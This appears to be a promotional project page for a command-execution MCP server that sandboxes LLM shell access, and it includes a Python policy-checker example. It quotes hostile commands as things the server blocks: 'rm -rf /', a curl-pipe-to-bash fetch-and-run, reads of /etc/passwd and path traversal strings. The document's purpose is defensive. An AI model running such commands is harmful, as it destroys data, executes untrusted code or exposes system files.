Secure Model Context Protocol server that exposes a controlled command-line execution API with extensive security controls (command/flag whitelisting, path validation, timeouts, etc.).
https://github.com/MladenSU/cli-mcp-server

You know the drill: your LLM needs to run commands, but opening up CLI access feels like handing dynamite to a toddler. You could build your own security wrapper, spend weeks on edge cases, and still lose sleep over path traversals and command injection. Or you could use CLI MCP Server and get production-ready security controls in minutes.
LLMs are incredibly powerful at generating and executing commands, but they're also incredibly good at accidentally (or intentionally) breaking things. You need them to run ls, cat, and grep - not rm -rf / or curl malicious-site.com | bash.
Most developers end up either:
CLI MCP Server gives you enterprise-grade command execution security without the enterprise development time:
Command Whitelisting: Only approved commands run. Period. No sneaky aliases, no path manipulation tricks.
Flag Validation: That innocent-looking --config=malicious.json flag? Blocked unless explicitly allowed.
Path Traversal Prevention: ../../../etc/passwd attempts get shut down with proper path normalization and validation.
Shell Operator Protection: Blocks &&, ||, |, and redirection operators by default. Enable them only when you need them.
Code Analysis Workflows: Let your LLM run grep, find, and cat on your codebase without worrying about it accessing your SSH keys or .env files.
```bash
# Safe: reads project files within allowed directory
cat src/main.py
grep -r "TODO" src/

# Blocked: attempts to access system files
cat /etc/passwd   # Security violation
ls ../../../      # Path traversal blocked
```
Log Investigation: Give your LLM access to specific log directories with read-only commands like tail, grep, and awk.
Development Automation: Allow controlled execution of build tools, linters, and test runners within sandboxed project directories.
Set your security boundaries with environment variables - no complex config files to maintain:
```bash
ALLOWED_DIR="/your/project/root"
ALLOWED_COMMANDS="ls,cat,grep,find,tail"
ALLOWED_FLAGS="-l,-a,-r,--help"
COMMAND_TIMEOUT="30"
```
Need more flexibility? Set ALLOWED_COMMANDS="all" for development and lock it down for production. The security model adapts to your workflow, not the other way around.
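To make the validation layers concrete, here is an added example (not cli-mcp-server's own code) of a small policy checker driven by the same four environment variables shown above. It rejects shell operators before parsing, requires a bare whitelisted command name, judges `--flag=value` by its `--flag` part, confines every path-looking argument to `ALLOWED_DIR` after `realpath` normalization, and runs the result with `shell=False` and the configured timeout. The `ALLOW_SHELL_OPERATORS` variable is an assumption standing in for whatever opt-in the project provides; the sample policy and directory are constructed for the demo.

```python
"""Added example: a minimal command policy checker modelled on the controls the
page describes. Illustrative code, not cli-mcp-server's implementation.
ALLOW_SHELL_OPERATORS is a hypothetical opt-in name."""
import os
import re
import shlex
import subprocess
import tempfile
from dataclasses import dataclass
from typing import Optional


class SecurityError(Exception):
    """Raised when a command violates the configured policy."""


@dataclass(frozen=True)
class Policy:
    allowed_dir: str                  # realpath; all path arguments must stay inside
    commands: Optional[frozenset]     # None means "all"
    flags: Optional[frozenset]        # None means "all"
    timeout: int
    allow_shell_operators: bool


def policy_from_env(env: dict) -> Policy:
    """Build a Policy from the environment variables the page documents."""
    def csv(key: str) -> Optional[frozenset]:
        raw = env.get(key, "")
        if raw == "all":
            return None
        return frozenset(x.strip() for x in raw.split(",") if x.strip())
    return Policy(
        allowed_dir=os.path.realpath(env["ALLOWED_DIR"]),
        commands=csv("ALLOWED_COMMANDS"),
        flags=csv("ALLOWED_FLAGS"),
        timeout=int(env.get("COMMAND_TIMEOUT", "30")),
        # hypothetical opt-in; the page only says operators are off by default
        allow_shell_operators=env.get("ALLOW_SHELL_OPERATORS", "false").lower() == "true",
    )


# &&, ||, |, ;, &, redirection, backticks and $( ) are refused on the raw string,
# before any parsing, so quoting tricks cannot smuggle them past the check.
SHELL_OPERATORS = re.compile(r"&&|\|\||[|;&<>`]|\$\(")


def looks_like_path(arg: str) -> bool:
    return "/" in arg or arg in (".", "..") or arg.startswith("~")


def confine(arg: str, allowed_dir: str) -> str:
    """Resolve arg relative to allowed_dir and refuse anything that escapes it."""
    resolved = os.path.realpath(os.path.join(allowed_dir, os.path.expanduser(arg)))
    if os.path.commonpath([allowed_dir, resolved]) != allowed_dir:
        raise SecurityError(f"path escapes ALLOWED_DIR: {arg}")
    return resolved


def validate(command: str, policy: Policy) -> list:
    """Return argv for a compliant command; raise SecurityError otherwise."""
    if not policy.allow_shell_operators and SHELL_OPERATORS.search(command):
        raise SecurityError("shell operators are disabled")
    try:
        argv = shlex.split(command)
    except ValueError as exc:
        raise SecurityError(f"unparseable command: {exc}")
    if not argv:
        raise SecurityError("empty command")
    prog = argv[0]
    if "/" in prog:  # /bin/cat, ./cat, ../cat: only bare names are compared
        raise SecurityError("command must be a bare name, not a path")
    if policy.commands is not None and prog not in policy.commands:
        raise SecurityError(f"command not allowed: {prog}")
    for arg in argv[1:]:
        if arg.startswith("-"):
            flag = arg.split("=", 1)[0]  # --config=x.json is judged as --config
            if policy.flags is not None and flag not in policy.flags:
                raise SecurityError(f"flag not allowed: {flag}")
        elif looks_like_path(arg):
            confine(arg, policy.allowed_dir)
    return argv


def run_command(command: str, policy: Policy) -> subprocess.CompletedProcess:
    argv = validate(command, policy)
    # shell=False hands argv straight to exec, so no shell reinterprets it;
    # cwd pins relative paths to ALLOWED_DIR; timeout kills runaway processes.
    return subprocess.run(argv, cwd=policy.allowed_dir, shell=False,
                          capture_output=True, text=True, timeout=policy.timeout)


def make_demo_dir() -> str:
    """Constructed workspace for the demo: a temp dir holding one file."""
    d = tempfile.mkdtemp()
    open(os.path.join(d, "hello.txt"), "w").close()
    return d


if __name__ == "__main__":
    policy = policy_from_env({"ALLOWED_DIR": make_demo_dir(),
                              "ALLOWED_COMMANDS": "ls,cat,grep,find,tail",
                              "ALLOWED_FLAGS": "-l,-a,-r,--help",
                              "COMMAND_TIMEOUT": "30"})
    for cmd in ["cat src/main.py", 'grep -r "TODO" src/', "cat /etc/passwd",
                "ls ../../../", "cat src/main.py | tail", "cat --config=evil.json src/main.py"]:
        try:
            validate(cmd, policy)
            print("allowed:", cmd)
        except SecurityError as err:
            print("blocked:", cmd, "->", err)
```

Two design points worth noting: operators are rejected on the raw string rather than after tokenizing, because `shlex` would happily turn `"a;b"` into a harmless-looking token, and path confinement compares `realpath` results with `commonpath`, so symlinks and `..` sequences are judged by where they actually land, not by how they are spelled. Combined short flags such as `-la` are compared as one token here; a real implementation would need to decide how to expand them.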
Add it to Claude Desktop with a simple config update:
```json
{
  "mcpServers": {
    "cli-mcp-server": {
      "command": "uvx",
      "args": ["cli-mcp-server"],
      "env": {
        "ALLOWED_DIR": "/your/workspace",
        "ALLOWED_COMMANDS": "ls,cat,grep,find",
        "COMMAND_TIMEOUT": "30"
      }
    }
  }
}
```
That's it. Your LLM now has secure command-line access with all the safety rails in place.
Command injection isn't just a theoretical risk - it's the #1 way LLM applications get compromised. One malicious prompt, one unescaped semicolon, and your entire system is compromised.
CLI MCP Server treats security as the foundation, not an afterthought. Every command goes through multiple validation layers. Every path gets normalized and checked. Every timeout gets enforced.
You get the command-line functionality your LLM needs with the security your production environment demands. No compromises, no sleepless nights, no explaining to your security team why the AI deleted the database.
```bash
# Install via Smithery (automatic Claude Desktop setup)
npx @smithery/cli install cli-mcp-server --client claude

# Or install manually
uvx cli-mcp-server
```
Set your ALLOWED_DIR, define your command whitelist, and you're running secure CLI operations immediately.
The 115+ stars and growing community aren't just validation - they're proof that developers need this exact solution. Stop building security from scratch and start building features that matter.